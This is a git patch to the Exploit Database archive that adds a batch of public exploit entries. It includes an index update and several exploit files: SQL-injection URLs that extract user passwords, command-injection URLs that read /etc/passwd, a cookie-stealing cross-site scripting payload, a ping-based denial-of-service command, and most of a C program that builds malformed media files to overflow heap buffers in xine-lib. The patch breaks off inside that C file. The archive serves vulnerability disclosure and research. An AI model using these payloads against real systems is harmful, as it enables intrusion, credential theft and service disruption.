From b702913b4109b2834c9dcf87346d6a018df4e97b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 8 Feb 2014 04:27:41 +0000 Subject: [PATCH] Updated 02_08_2014 --- files.csv | 62 +++++ platforms/asp/webapps/31463.txt | 9 + platforms/cgi/webapps/31466.txt | 11 + platforms/hardware/dos/31478.txt | 9 + platforms/jsp/webapps/31475.txt | 9 + platforms/linux/remote/31462.c | 375 ++++++++++++++++++++++++++++++ platforms/linux/remote/31518.rb | 113 +++++++++ platforms/multiple/dos/31477.txt | 9 + platforms/osx/remote/31473.html | 9 + platforms/php/remote/31479.txt | 9 + platforms/php/webapps/31424.txt | 27 +++ platforms/php/webapps/31458.txt | 35 +++ platforms/php/webapps/31459.txt | 24 ++ platforms/php/webapps/31467.txt | 9 + platforms/php/webapps/31468.txt | 14 ++ platforms/php/webapps/31469.txt | 9 + platforms/php/webapps/31470.txt | 9 + platforms/php/webapps/31471.txt | 7 + platforms/php/webapps/31472.txt | 7 + platforms/php/webapps/31476.txt | 8 + platforms/php/webapps/31480.txt | 9 + platforms/php/webapps/31481.txt | 9 + platforms/php/webapps/31482.txt | 9 + platforms/php/webapps/31483.txt | 9 + platforms/php/webapps/31484.txt | 9 + platforms/php/webapps/31485.txt | 9 + platforms/php/webapps/31486.txt | 9 + platforms/php/webapps/31487.txt | 9 + platforms/php/webapps/31488.txt | 9 + platforms/php/webapps/31489.txt | 9 + platforms/php/webapps/31490.txt | 9 + platforms/php/webapps/31491.txt | 9 + platforms/php/webapps/31492.txt | 9 + platforms/php/webapps/31493.txt | 9 + platforms/php/webapps/31494.txt | 9 + platforms/php/webapps/31495.txt | 9 + platforms/php/webapps/31496.txt | 9 + platforms/php/webapps/31497.txt | 9 + platforms/php/webapps/31498.txt | 9 + platforms/php/webapps/31499.txt | 9 + platforms/php/webapps/31500.txt | 9 + platforms/php/webapps/31501.txt | 9 + platforms/php/webapps/31502.txt | 9 + platforms/php/webapps/31503.txt | 9 + platforms/php/webapps/31504.txt | 9 + platforms/php/webapps/31505.txt | 9 + platforms/php/webapps/31506.txt | 9 + platforms/php/webapps/31507.txt | 9 + platforms/php/webapps/31508.txt | 9 + platforms/php/webapps/31509.txt | 9 + platforms/php/webapps/31510.txt | 9 + platforms/php/webapps/31511.txt | 9 + platforms/php/webapps/31512.txt | 9 + platforms/php/webapps/31513.txt | 9 + platforms/php/webapps/31514.txt | 9 + platforms/php/webapps/31516.txt | 74 ++++++ platforms/php/webapps/31517.txt | 35 +++ platforms/windows/dos/31461.txt | 189 +++++++++++++++ platforms/windows/dos/31464.pl | 34 +++ platforms/windows/local/31386.rb | 127 ++++++++++ platforms/windows/local/31460.txt | 65 ++++++ platforms/windows/remote/31465.cs | 18 ++ platforms/windows/remote/31474.py | 44 ++++ 63 files changed, 1665 insertions(+) create mode 100755 platforms/asp/webapps/31463.txt create mode 100755 platforms/cgi/webapps/31466.txt create mode 100755 platforms/hardware/dos/31478.txt create mode 100755 platforms/jsp/webapps/31475.txt create mode 100755 platforms/linux/remote/31462.c create mode 100755 platforms/linux/remote/31518.rb create mode 100755 platforms/multiple/dos/31477.txt create mode 100755 platforms/osx/remote/31473.html create mode 100755 platforms/php/remote/31479.txt create mode 100755 platforms/php/webapps/31424.txt create mode 100755 platforms/php/webapps/31458.txt create mode 100755 platforms/php/webapps/31459.txt create mode 100755 platforms/php/webapps/31467.txt create mode 100755 platforms/php/webapps/31468.txt create mode 100755 platforms/php/webapps/31469.txt create mode 100755 platforms/php/webapps/31470.txt create mode 100755 platforms/php/webapps/31471.txt create mode 100755 platforms/php/webapps/31472.txt create mode 100755 platforms/php/webapps/31476.txt create mode 100755 platforms/php/webapps/31480.txt create mode 100755 platforms/php/webapps/31481.txt create mode 100755 platforms/php/webapps/31482.txt create mode 100755 platforms/php/webapps/31483.txt create mode 100755 platforms/php/webapps/31484.txt create mode 100755 platforms/php/webapps/31485.txt create mode 100755 platforms/php/webapps/31486.txt create mode 100755 platforms/php/webapps/31487.txt create mode 100755 platforms/php/webapps/31488.txt create mode 100755 platforms/php/webapps/31489.txt create mode 100755 platforms/php/webapps/31490.txt create mode 100755 platforms/php/webapps/31491.txt create mode 100755 platforms/php/webapps/31492.txt create mode 100755 platforms/php/webapps/31493.txt create mode 100755 platforms/php/webapps/31494.txt create mode 100755 platforms/php/webapps/31495.txt create mode 100755 platforms/php/webapps/31496.txt create mode 100755 platforms/php/webapps/31497.txt create mode 100755 platforms/php/webapps/31498.txt create mode 100755 platforms/php/webapps/31499.txt create mode 100755 platforms/php/webapps/31500.txt create mode 100755 platforms/php/webapps/31501.txt create mode 100755 platforms/php/webapps/31502.txt create mode 100755 platforms/php/webapps/31503.txt create mode 100755 platforms/php/webapps/31504.txt create mode 100755 platforms/php/webapps/31505.txt create mode 100755 platforms/php/webapps/31506.txt create mode 100755 platforms/php/webapps/31507.txt create mode 100755 platforms/php/webapps/31508.txt create mode 100755 platforms/php/webapps/31509.txt create mode 100755 platforms/php/webapps/31510.txt create mode 100755 platforms/php/webapps/31511.txt create mode 100755 platforms/php/webapps/31512.txt create mode 100755 platforms/php/webapps/31513.txt create mode 100755 platforms/php/webapps/31514.txt create mode 100755 platforms/php/webapps/31516.txt create mode 100755 platforms/php/webapps/31517.txt create mode 100755 platforms/windows/dos/31461.txt create mode 100755 platforms/windows/dos/31464.pl create mode 100755 platforms/windows/local/31386.rb create mode 100755 platforms/windows/local/31460.txt create mode 100755 platforms/windows/remote/31465.cs create mode 100755 platforms/windows/remote/31474.py diff --git a/files.csv b/files.csv index 907003701..197f31675 100755 --- a/files.csv +++ b/files.csv @@ -28195,6 +28195,7 @@ id,file,description,date,author,platform,type,port 31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0 +31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 (.m3u) - SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 @@ -28227,6 +28228,7 @@ id,file,description,date,author,platform,type,port 31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 +31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 @@ -28258,3 +28260,63 @@ id,file,description,date,author,platform,type,port 31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 +31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80 +31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0 +31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0 +31462,platforms/linux/remote/31462.c,"xine-lib Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 +31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0 +31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0 +31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0 +31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 +31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 +31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 +31469,platforms/php/webapps/31469.txt,"ooComments 1.0 classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31470,platforms/php/webapps/31470.txt,"ooComments 1.0 classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0 +31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0 +31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 +31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 +31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 +31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0 +31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0 +31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0 +31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 +31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 +31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 +31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 diff --git a/platforms/asp/webapps/31463.txt b/platforms/asp/webapps/31463.txt new file mode 100755 index 000000000..375b72027 --- /dev/null +++ b/platforms/asp/webapps/31463.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28376/info + +Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users + +http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users \ No newline at end of file diff --git a/platforms/cgi/webapps/31466.txt b/platforms/cgi/webapps/31466.txt new file mode 100755 index 000000000..66c32ceed --- /dev/null +++ b/platforms/cgi/webapps/31466.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28393/info + +Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input. + +Successful attacks can compromise the affected application and possibly the underlying computer. + +These issues affect Webutil 2.3 and 2.7. + +http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd +http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd +http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd \ No newline at end of file diff --git a/platforms/hardware/dos/31478.txt b/platforms/hardware/dos/31478.txt new file mode 100755 index 000000000..e20b4f716 --- /dev/null +++ b/platforms/hardware/dos/31478.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28414/info + +Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession. + +Attackers can exploit this issue to deny access to the device's control center for legitimate users. Reports indicate that this issue is exploitable only via computers on the same LAN as the device. + +Linksys SPA-2102 Phone Adapter running firmware 3.3.6 is vulnerable; other versions may also be affected. + +ping -l 65500 192.168.0.1 \ No newline at end of file diff --git a/platforms/jsp/webapps/31475.txt b/platforms/jsp/webapps/31475.txt new file mode 100755 index 000000000..b120df21b --- /dev/null +++ b/platforms/jsp/webapps/31475.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28411/info + +Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +OpenCms 7.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E \ No newline at end of file diff --git a/platforms/linux/remote/31462.c b/platforms/linux/remote/31462.c new file mode 100755 index 000000000..beb40945f --- /dev/null +++ b/platforms/linux/remote/31462.c @@ -0,0 +1,375 @@ +source: http://www.securityfocus.com/bid/28370/info + +The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. + +Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions. + +These issues affect xine-lib 1.1.11; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; +typedef int64_t i64; +typedef uint64_t u64; + + + +#define VER "0.1" +#define BUFFSZ 0xffff + + + +#define BE_FOURCC( ch0, ch1, ch2, ch3 ) \ + ( (uint32_t)(unsigned char)(ch3) | \ + ( (uint32_t)(unsigned char)(ch2) << 8 ) | \ + ( (uint32_t)(unsigned char)(ch1) << 16 ) | \ + ( (uint32_t)(unsigned char)(ch0) << 24 ) ) +#define FLV_FLAG_HAS_VIDEO 0x01 +#define FLV_FLAG_HAS_AUDIO 0x04 +#define FLV_TAG_TYPE_SCRIPT 0x12 +#define FLV_DATA_TYPE_NUMBER 0x00 +#define FLV_DATA_TYPE_OBJECT 0x03 +#define FLV_DATA_TYPE_ENDOBJECT 0x09 +#define FLV_DATA_TYPE_ARRAY 0x0a +#define MOOV_ATOM BE_FOURCC('m', 'o', 'o', 'v') +#define RMRA_ATOM BE_FOURCC('r', 'm', 'r', 'a') +#define RDRF_ATOM BE_FOURCC('r', 'd', 'r', 'f') +#define RMF_TAG BE_FOURCC('.', 'R', 'M', 'F') +#define PROP_TAG BE_FOURCC('P', 'R', 'O', 'P') +#define MDPR_TAG BE_FOURCC('M', 'D', 'P', 'R') +#define DATA_TAG BE_FOURCC('D', 'A', 'T', 'A') +#define INDX_TAG BE_FOURCC('I', 'N', 'D', 'X') +#define VIDO_TAG BE_FOURCC('V', 'I', 'D', 'O') +#define DATA_CHUNK_HEADER_SIZE 10 +#define FORM_TAG BE_FOURCC('F', 'O', 'R', 'M') +#define MOVE_TAG BE_FOURCC('M', 'O', 'V', 'E') +#define PC_TAG BE_FOURCC('_', 'P', 'C', '_') +#define PALT_TAG BE_FOURCC('P', 'A', 'L', 'T') +#define PALETTE_SIZE 256 +#define PALETTE_CHUNK_SIZE (PALETTE_SIZE * 3) +#define EBML_ID_EBML 0x1A45DFA3 +#define EBML_ID_DOCTYPE 0x4282 +#define GST_EBML_SIZE_UNKNOWN 0x00ffffffffffffffULL +#define GST_EBML_ID_VOID 0xEC +#define FILM_TAG BE_FOURCC('F', 'I', 'L', 'M') +#define STAB_TAG BE_FOURCC('S', 'T', 'A', 'B') + + + +int gst_ebml_write_element_id(u8 *data, u32 id); // from Gstreamer +int gst_ebml_write_element_size(u8 *data, i64 size); // from Gstreamer +int putcc(u8 *data, int chr, int len); +int putss(u8 *data, u8 *str); +int putxb(u8 *data, u64 num, int bits); +int putxi(u8 *data, u64 num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + attack; + u8 *buff, + *fname, + *psize, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "xine-lib <= 1.1.11 multiple heap overflows "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attacks:\n" + " 1 = heap overflow in demux_flv (file.FLV)\n" + " 2 = heap overflow in demux_qt (file.MOV)\n" + " 3 = heap overflow in demux_real (file.RM)\n" + " 4 = heap overflow in demux_wc3movie (file.MVE)\n" + " 5 = heap overflow in ebml.c (file.MKV)\n" + " 6 = heap overflow in demux_film.c (file.CAK)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + + p = buff; + if(attack == 1) { + p += putss(p, "FLV\x01"); + *p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO; + p += putxb(p, 9, 32); + p += putxb(p, 0, 32); + p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8); // tag_type + psize = p; p += 3; + p += putxb(p, 0, 32); // pts + p += putxb(p, 0, 24); + p += putxb(p, FLV_DATA_TYPE_OBJECT, 8); + p += putxb(p, 13, 16); + p += putss(p, "filepositions"); + p += putxb(p, FLV_DATA_TYPE_ARRAY, 8); + p += putxb(p, 0x20000000, 32); + for(i = 0; i < 4000; i++) { + p += putxb(p, FLV_DATA_TYPE_NUMBER, 8); + p += putxb(p, 0x4141414141414141ULL, 64); + } + p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8); // useless + putxb(psize, p - (psize + 3 + 4 + 3), 24); + + } else if(attack == 2) { + p += putxb(p, 8000 - 24, 32); + p += putxb(p, MOOV_ATOM, 32); + p += putxb(p, 8000 - 16, 32); + p += putxb(p, RMRA_ATOM, 32); + p += putxb(p, 8000 - 8, 32); + p += putxb(p, RDRF_ATOM, 32); + p += putxb(p, 0, 32); // i + 4 + p += putxb(p, 0, 32); // i + 8 + p += putxb(p, 0xffffffff, 32); // i + 12 + p += putcc(p, 'A', 8000 - 12); + + } else if(attack == 3) { + p += putxb(p, RMF_TAG, 32); + p += putxb(p, 8, 32); + p += putxb(p, MDPR_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 1, 16); // mdpr->stream_number + p += putxb(p, 0, 32); // mdpr->max_bit_rate + p += putxb(p, 0, 32); // mdpr->avg_bit_rate + p += putxb(p, 0, 32); // mdpr->max_packet_size + p += putxb(p, 0, 32); // mdpr->avg_packet_size + p += putxb(p, 0, 32); // mdpr->start_time + p += putxb(p, 0, 32); // mdpr->preroll + p += putxb(p, 0, 32); // mdpr->duration + p += putxb(p, 0, 8); // mdpr->stream_name_size + // mdpr->stream_name + p += putxb(p, 0, 8); // +mdpr->mime_type_size=data[33+mdpr->stream_name_size]; + // mdpr->mime_type + p += putxb(p, 8, 32); // mdpr->type_specific_len + p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data + p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data + putxb(psize, (p - psize) + 4, 32); + p += putxb(p, PROP_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 0, 32); + p += putxb(p, 1, 32); // avg_bitrate + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); // this->duration + p += putxb(p, 0, 32); + p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32); +// this->index_start + p += putxb(p, 0, 32); // this->data_start + putxb(psize, (p - psize) + 4, 32); + p += putxb(p, DATA_TAG, 32); + psize = p; p += 4; + p += putxb(p, 0, 16); + p += putxb(p, 0, 32); // +this->current_data_chunk_packet_count + p += putxb(p, 0, 32); // +this->next_data_chunk_offset + p += putxb(p, INDX_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 16); + p += putxb(p, 0x15555556, 32); // entries + p += putxb(p, 1, 16); // stream_num + p += putxb(p, 0, 32); // next_index_chunk + for(i = 0; i < 4000; i++) { + p += 